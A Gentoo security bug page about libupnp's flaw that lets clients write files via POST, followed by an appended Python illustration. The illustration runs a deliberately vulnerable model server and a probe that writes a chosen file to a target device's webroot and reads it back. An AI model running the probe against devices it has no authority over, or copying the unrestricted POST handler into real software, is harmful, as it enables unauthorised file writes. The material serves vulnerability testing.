Summary: | <net-libs/libupnp-1.6.18-r2: write files via POST | |
---|---|---|---
Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago>
Component: | Vulnerabilities | Assignee: | Gentoo Security <security>
Status: | RESOLVED FIXED | |
Severity: | normal | CC: | gurligebis, maq, proxy-maint, thev00d00
Priority: | Normal | Keywords: | STABLEREQ
Version: | unspecified | Flags: | kensington: sanity-check+
Hardware: | All | |
OS: | Linux | |
URL: | http://www.openwall.com/lists/oss-security/2016/07/18/13 | |
Whiteboard: | B2 [glsa cve blocked] | |
Package list: | =net-libs/libupnp-1.6.20 | |
Runtime testing required: | --- | |
Bug Depends on: | 598202 | |
Bug Blocks: | | |
Description
Agostino Sarubbo
2016-07-19 07:46:50 UTC
Upstream issue: https://sourceforge.net/p/pupnp/bugs/132/

I've committed the patch to the tree: https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=11bbfa2ad250fc7af97ecc95100fe45dcd86356f

I've left stable alone for now with an -r2 version of the stable package. I guess 1.6.19 would be a better candidate for stable as it's been in the tree for ages. Maintainer(s), please advise if you are ready for stabilization or call for stabilization yourself.

Sure, go ahead and stabilize.

What version?

1.6.19-r1

Is 1.6.20 patched? Even though it is not stable it would still need to be patched.

@ Yury: Upstream's v1.6.20 isn't fixed, see https://sourceforge.net/p/pupnp/code/ci/release-1.6.20/tree/upnp/src/genlib/net/http/webserver.c and compare with https://gitweb.gentoo.org/repo/gentoo.git/diff/net-libs/libupnp/files/CVE-2016-6255.patch?id=84d8f21cc2ca94d4f4a3146302726bd1c8fd3f47

However, our v1.6.20 in tree contains the fix, see https://gitweb.gentoo.org/repo/gentoo.git/tree/net-libs/libupnp/libupnp-1.6.20.ebuild#n22

@ Arches, please test and mark stable: =net-libs/libupnp-1.6.20
Stable targets: alpha amd64 arm hppa ppc ppc64 sparc x86

amd64 stable

x86 stable

arm stable

sparc stable

ppc stable

ppc64 stable

Superseded by bug 598202.

This issue was resolved and addressed in GLSA 201701-52 at https://security.gentoo.org/glsa/201701-52 by GLSA coordinator Aaron Bauman (b-man).
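As an added illustration for this bug (not libupnp code, and not the upstream or Gentoo patch), the Python below models the behaviour the bug title describes: an embedded HTTP server that writes the body of any POST to a file under its document root, next to a hardened variant that refuses POSTs for paths it has no registered handler for. It also includes the probe a tester would run against a deployed instance before and after updating: POST a marker file to an unused path, then GET it back. The servers, the temporary document roots and the probe path are constructed for the example; the hardened variant's 403 response is a choice made here, not a claim about what fixed libupnp returns.

```python
"""Model of the 'write files via POST' bug class, plus a probe for it.

Added example for this bug page; not libupnp code and not the upstream fix.
"""
import http.client
import os
import tempfile
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def make_handler(docroot, allow_unhandled_post):
    """Build a handler serving files from docroot.

    allow_unhandled_post=True models the vulnerable behaviour: a POST to any
    path under the webroot creates or overwrites that file.  False models the
    hardened behaviour: a POST with no registered handler is refused.
    """
    docroot = os.path.realpath(docroot)

    class Handler(BaseHTTPRequestHandler):
        def log_message(self, fmt, *args):
            pass  # keep the demo quiet

        def _local_path(self):
            # Map the URL path onto docroot and refuse anything escaping it.
            rel = self.path.split("?", 1)[0].lstrip("/")
            full = os.path.realpath(os.path.join(docroot, rel))
            if os.path.commonpath([docroot, full]) != docroot:
                return None
            return full

        def do_GET(self):
            full = self._local_path()
            if full is None or not os.path.isfile(full):
                self.send_error(404)
                return
            with open(full, "rb") as fh:
                data = fh.read()
            self.send_response(200)
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def do_POST(self):
            body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
            full = self._local_path()
            if full is None or not allow_unhandled_post:
                # Hardened: nothing is registered for this path, drop the body.
                self.send_error(403)
                return
            # Vulnerable: an unauthenticated client writes into the webroot.
            with open(full, "wb") as fh:
                fh.write(body)
            self.send_response(200)
            self.send_header("Content-Length", "0")
            self.end_headers()

    return Handler


def start_server(docroot, allow_unhandled_post):
    """Start a server on an ephemeral localhost port and return it."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0),
                              make_handler(docroot, allow_unhandled_post))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(host, port, path="/x-upnp-probe.txt", payload=b"probe"):
    """POST a marker to an unused path, then GET it back.

    Returns (post_status, get_status, get_body).  A server that answers
    200/200 with the marker body lets unauthenticated clients write files.
    """
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", path, body=payload)
    resp = conn.getresponse()
    resp.read()
    post_status = resp.status
    conn.close()
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read()
    get_status = resp.status
    conn.close()
    return post_status, get_status, body


def is_writable_via_post(host, port, path="/x-upnp-probe.txt"):
    """True when the target stores and serves back an arbitrary POST body."""
    post_status, get_status, body = probe(host, port, path, b"probe")
    return post_status == 200 and get_status == 200 and body == b"probe"


def demo():
    """Probe a vulnerable and a hardened model server; return the raw results."""
    results = {}
    for name, allow in (("vulnerable", True), ("hardened", False)):
        srv = start_server(tempfile.mkdtemp(), allow)
        try:
            results[name] = probe(*srv.server_address)
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Against a real device, `is_writable_via_post(host, port)` is the check: a 200 on the POST followed by a 200 GET that echoes the marker means the webroot is writable by anyone who can reach the UPnP port, which is the condition the bug title names; remove the marker afterwards if the target turns out to be affected.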